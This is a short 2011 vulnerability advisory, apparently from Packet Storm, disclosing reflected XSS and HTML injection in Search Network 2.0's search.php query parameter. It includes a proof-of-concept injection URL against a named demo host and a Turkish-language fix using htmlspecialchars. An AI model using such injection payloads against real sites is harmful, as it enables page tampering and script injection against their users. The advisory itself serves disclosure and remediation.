Search Network 2.0 Cross Site Scripting

🗓️ 07 Aug 2011 00:00:00Reported by darkTRType

packetstorm🔗 packetstormsecurity.com👁 21 Views

Search Network 2.0 XSS Vulnerability in search.ph

`##############################################################  
  
[#] Script Name : Search Network 2.0  
  
[#] Vulnerable Type : XSS Vulnerability  
  
[#] Author : darkTR  
  
[#] Date : 03.08.2011  
  
[#] E-mail : [email protected]  
  
[#] Target: : search.php?action=search_results&query=[XSS]  
  
[#] Demo: : http://developer.searchnetworkhq.com/demo/search.php?  
  
#############################################################  
  
Exploits :  
  
HTML ÝNJECTION  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=><marquee>darkTR<%2Fmarquee>  
  
XSS  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]  
  
Açýðýn Kapatýlmasý ;  
  
  
Htmlspecialchars kullanarak açýðý kapatabiliriz. Ýndex.php dosyasýný açarak ;  
  
$result = file_get_contents($url);, (Helvetica, sans-serif">Bu kýsmý aþaðýdaki þekilde düzeltmeliyiz.)  
  
$result = htmlspecialchars(file_get_contents($url));  
  
Düzeltme iþleminden sonra ">,<" gibi karakterler htmlye dönüþecektir ve zaafiyet ortadan kalkacaktýr.  
  
darkTR | Code Hunters TIM   
`

07 Aug 2011 00:00Current